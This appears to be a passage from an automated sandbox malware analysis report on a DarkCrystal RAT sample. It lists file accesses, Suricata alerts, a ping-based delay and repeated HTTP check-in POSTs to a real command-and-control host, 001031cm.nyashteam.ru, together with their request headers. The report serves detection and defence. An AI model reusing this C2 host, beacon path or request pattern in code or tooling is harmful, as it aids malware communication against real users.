                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49757 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49746 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49768 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49773 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49883 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49845 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49825 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49863 -> 172.67.186.200:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49892 -> 172.67.186.200:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 001031cm.nyashteam.ru
                                    Source: unknownHTTP traffic detected: POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 001031cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:47:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r163hsmlEZ0DX9Zg85zDYkLN8MPQflsDvA6LsGla8hiOpdvo69gTkAqMWBrL4Gf2Z2Nrqom%2FJPRMbyowkU0oJNt%2BItVRwN876mPghGvSZiqlUYva3XL02PaNdQzUYMZDaby7psXMBok%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f951830ffe342ea-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4694&min_rtt=1732&rtt_var=6574&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=57410&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Sxd7UxESLVQU%2B%2Fajx2WtV0H3HNTu3lLUYP3RZRf1zEmWDBo1vP65xh5ys44UQjslgljhtGx56JS2BJhAlqMxP96g8r4EuJsSN2v6CkUG7ZwyoZGap68SnXLtvbPkpyJQLpexFKBYXM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f95186dbe2d1a30-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4254&min_rtt=1995&rtt_var=5267&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=72745&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Fmcb0Cu8ZrZiRo6MvH5KXF%2FurRZ6uhspH8QePOTJNnmiB5dIb0iRBb9QlqTodKCoPgiRdOZzq%2Fqh7J1l1Z8%2BNQhKqfytiMTxEB8OmvigqSi7A0Qbitx5ah35X7GF%2F1XgH86Esm5Les%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f95188dac14423b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3833&min_rtt=1775&rtt_var=4782&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=80039&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BdFEjGTtpmmF5qeUaD4dSKXHFck3CDxJpX0HaVTT6ckf5TnrFD7uk9zfL6Ion3DiOR9u8Vf%2Bf5LedgO54uhNwVC8CZZZkSgbdvK66Ei9IUWYojyPwB04OsOX0Zd3lElj7njj6IG%2FDE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9518a41f50c33b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2920&min_rtt=1565&rtt_var=3297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=685&delivery_rate=117675&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d54nnMoyjxclELRnw72Vhogz2H%2BEZ9IwFpds0%2BTmCEdcPAiNyd9ba3EWDyJu1wqDuCplGzhH4Ju5MX1w4TQqmmQg%2BvMn2GBHOI5RKY7cnYEQqb73GXvnGNNVjznuDDZ9%2Bk%2Bh7y6MyPI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9518bbcb208cba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3733&min_rtt=1971&rtt_var=4264&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=90852&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tcy1f9wSve3aZE0AU97eF5%2BAqUnNSW1P8p0%2FfWF1besIL6DHwdxNHSOBZhEgpAMgIXH3tZy8GERQ%2FGo29ZgP5OIsaFgPrx9WDxR0Qx15RiFRDoEQqyMf%2FgaYkbg3h8xU6L2VLzvQgc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9518d92c22efa5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4954&min_rtt=1976&rtt_var=6697&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=56584&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GsxJOGs%2BCR%2FxTCB3GfY931Rifo9vdTLvppvhuFRwBu1TR8g6Oir0HFSe9BjUOgacG08dXUmBuhgLaZoAwgW9yRg6wyZOXUUNcD9OzwxJFoL5tC3dV15Tc%2FL30Rf42CsOST3pYoRj5U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9518ece9310c9e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3008&min_rtt=1590&rtt_var=3432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=112880&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8V%2BwyF1uA5Yp72w8ewnVsedizpmiGLnEvK%2FBKH5BPQWjbDNZN0BUIolEGWY7jR1K8m0H0UrycQvbnBI6uSEnXtUS%2FvO0bW2l21s2kGsSsNTXJvnRPAc60I8auJcij1NG24W2G8SJsw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f95197ded68efa7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6728&min_rtt=4296&rtt_var=6476&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=61450&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 22:48:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsl612QaSVc0G0dqc%2Fxjhqzrlfqeeub3rVcgAQdkB%2F84FGgzuDxD%2Fyhawyw%2BzryFH09q%2BA1fhwqvnqT6vyQmg1d6JavU%2Bd34CpdBTZYZDShTL%2Bt%2FIaMg9o7vMkBD2wftXZzHKXmySso%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9519b20ff14291-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3491&min_rtt=1726&rtt_var=4177&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=657&delivery_rate=92125&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
